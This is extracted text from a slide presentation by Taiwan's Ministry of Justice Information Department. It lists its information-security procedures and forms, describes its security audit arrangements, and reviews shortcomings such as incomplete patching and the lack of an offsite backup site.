* 法 務 部 資 訊 處 程 式 館 管 理 注 意 事 項<br />
* 法 務 部 資 訊 系 統 文 件 代 號 之 制 定 及 編 碼 原<br />
則<br />
* 法 務 部 資 訊 系 統 代 號 之 制 定 及 編 碼 原 則<br />
營 運 持 續 管 理<br />
* 法 務 部 電 腦 主 機 房 停 ( 斷 ) 電 處 理 程 序<br />
* 法 務 部 資 訊 處 資 訊 系 統 回 復 作 業 計 畫<br />
資 訊 安 全 稽 核<br />
* 法 務 部 及 所 屬 機 關 資 訊 安 全 稽 核 作 業 規 定<br />
* 資 通 安 全 自 我 檢 查 表<br />
*「 法 務 部 及 所 屬 各 機 關 資 訊 安 全 作 業 」 評<br />
分 表<br />
* 法 務 部 及 所 屬 各 機 關 資 訊 安 全 作 業 檢 查 表<br />
標 準 作 業 程 序<br />
* 軟 硬 體 保 管 單 之 標 準 作 業 管 控<br />
程 序<br />
標 準 作 業 程 序<br />
* 法 務 部 電 腦 教 室 申 請 使 用 程 序<br />
及 管 理 注 意 事 項<br />
標 準 作 業 程 序<br />
* 法 務 部 電 腦 機 房 標 準 作 業 程 序<br />
* 法 務 部 資 訊 處 測 試 區 設 備 使 用<br />
申 請 程 序<br />
使 用 表 單<br />
* 檢 察 機 關 資 料 查 詢 單<br />
* 矯 正 機 關 資 料 查 詢 單<br />
* 行 政 執 行 機 關 資 料 查 詢 單<br />
* 調 查 機 關 資 料 查 詢 單<br />
* 調 查 機 關 電 話 查 詢 單<br />
* 單 一 窗 口 資 料 查 詢 單<br />
標 準 作 業 程 序<br />
* 法 務 部 資 訊 系 統 委 外 服 務<br />
標 準 作 業 程 序 ( 草 案 )<br />
* 法 務 部 資 訊 系 統 維 運 標 準<br />
作 業 程 序 ( 草 案 )<br />
* 法 務 部 資 訊 系 統 推 廣 服 務<br />
標 準 作 業 程 序<br />
* 法 務 部 資 訊 系 統 問 題 反 應<br />
標 準 作 業 程 序<br />
資 訊 處<br />
使 用 表 單<br />
* 法 務 部 電 腦 教 室 使 用 申 請 表<br />
* 法 務 部 電 腦 教 室 使 用 情 形 彙<br />
整 表<br />
保 密 切 結 書<br />
* 法 務 部 資 訊 設 備 及 媒 體 檔 案<br />
攜 出 申 請 書<br />
* 法 務 部 資 訊 處 網 路 服 務 申 請<br />
單<br />
* 法 務 部 電 子 郵 件 暨 目 錄 服 務<br />
帳 號 申 請 單<br />
使 用 表 單<br />
機 房 管 理 作 業 規 範<br />
* 法 務 部 資 訊 處 機 房 工 作 日 誌<br />
* 法 務 部 資 訊 處 機 房 出 入 登 記<br />
表<br />
* 法 務 部 資 訊 處 機 房 物 品 出 入<br />
登 記 表<br />
* 法 務 部 資 訊 處 放 行 條<br />
* 法 務 部 資 訊 處 機 房 作 業 需 求<br />
委 託 申 請 單<br />
* 法 務 部 資 訊 處 系 統 備 份 作 業<br />
申 請 單<br />
* 進 入 機 房 作 業 申 請 單<br />
* 法 務 部 資 訊 處 網 路 服 務 單<br />
* 法 務 部 資 訊 處 機 房 問 題 處 理<br />
單<br />
* 法 務 部 資 訊 處 專 線 問 題 處 理<br />
表<br />
* 機 房 設 備 密 碼 表 拆 閱 申 請 單<br />
機 房 標 準 作 業 程 序<br />
* 入 侵 偵 測 系 統 記 錄 檢 核 表<br />
* 法 務 部 防 毒 及 誘 捕 主 機 系 統<br />
檢 視 記 錄<br />
* 法 務 部 資 訊 安 全 通 告<br />
* 技 術 服 務 中 心 警 示 系 統 報 告<br />
檢 視 記 錄<br />
* 法 務 部 NSOC 問 題 單 處 理 報<br />
告<br />
* 法 務 部 資 訊 處 媒 體 遞 送 清 單<br />
測<br />
試 區 使 用 申 請<br />
* 法 務 部 資 訊 處 使 用 測 試 區 出<br />
入 登 記 表<br />
* 法 務 部 資 訊 處 測 試 區 設 備 使<br />
用 申 請 單<br />
25<br />
捌 、 稽 核 ( 一 )<br />
資 訊 處<br />
• 目 的 :<br />
整 體 資 安 作 為 成 效 之 檢 驗 。<br />
強 化 資 安 政 策 推 動 之 效 果 。<br />
依 據 :<br />
• 法 務 部 及 所 屬 機 關 資 訊 安 全 稽 核 作 業 規 定 。<br />
組 織 :<br />
• 法 務 部 資 訊 安 全 稽 核 小 組 , 資 訊 處 處 長 擔 任 召 集 人 , 成 員<br />
由 檢 察 、 矯 正 、 政 風 等 代 表 組 成 。<br />
26
資 訊 處<br />
捌 、 稽 核 ( 二 )<br />
• 施 行 方 式 :<br />
資 安 外 部 稽 核 作 業<br />
• 書 面 查 核 ( 全 面 )<br />
• 實 地 查 核 ( 每 年 擇 定 5-6 個 所 屬 機 關 )<br />
資 安 內 部 稽 核 作 業 ( 法 務 部 各 司 處 )<br />
定 期 / 不 定 期<br />
資 訊 處 內 部 的 資 安 內 控 機 制<br />
27<br />
資 訊 處<br />
玖 、 檢 討<br />
• 資 訊 系 統 管 理 的 分 權 不 足 - 程 式 撰 寫 人<br />
員 、 系 統 ( 資 料 管 理 人 員 的 區 隔 )。<br />
• 系 統 負 責 人 對 於 系 統 技 術 細 節 漸 無 法 掌<br />
握 , 主 控 性 不 足<br />
• 設 備 ( 系 統 ) 之 PATCH 無 法 全 數 更 到 最 新<br />
版<br />
• 尚 未 建 置 異 地 備 援 機 房<br />
28
資 訊 處<br />
拾 、 結 語<br />
• 資 安 工 作 貴 在 實 踐 , 管 理 面 尤 應 重<br />
於 技 術 面 。<br />
• 雖 然 不 盡 美 善 , 但 我 們 追 求 在 有 限<br />
資 源 下 作 最 大 的 努 力 。<br />
29<br />
資 訊 處<br />
簡 報 完 畢<br />
敬 請 指 教<br />
30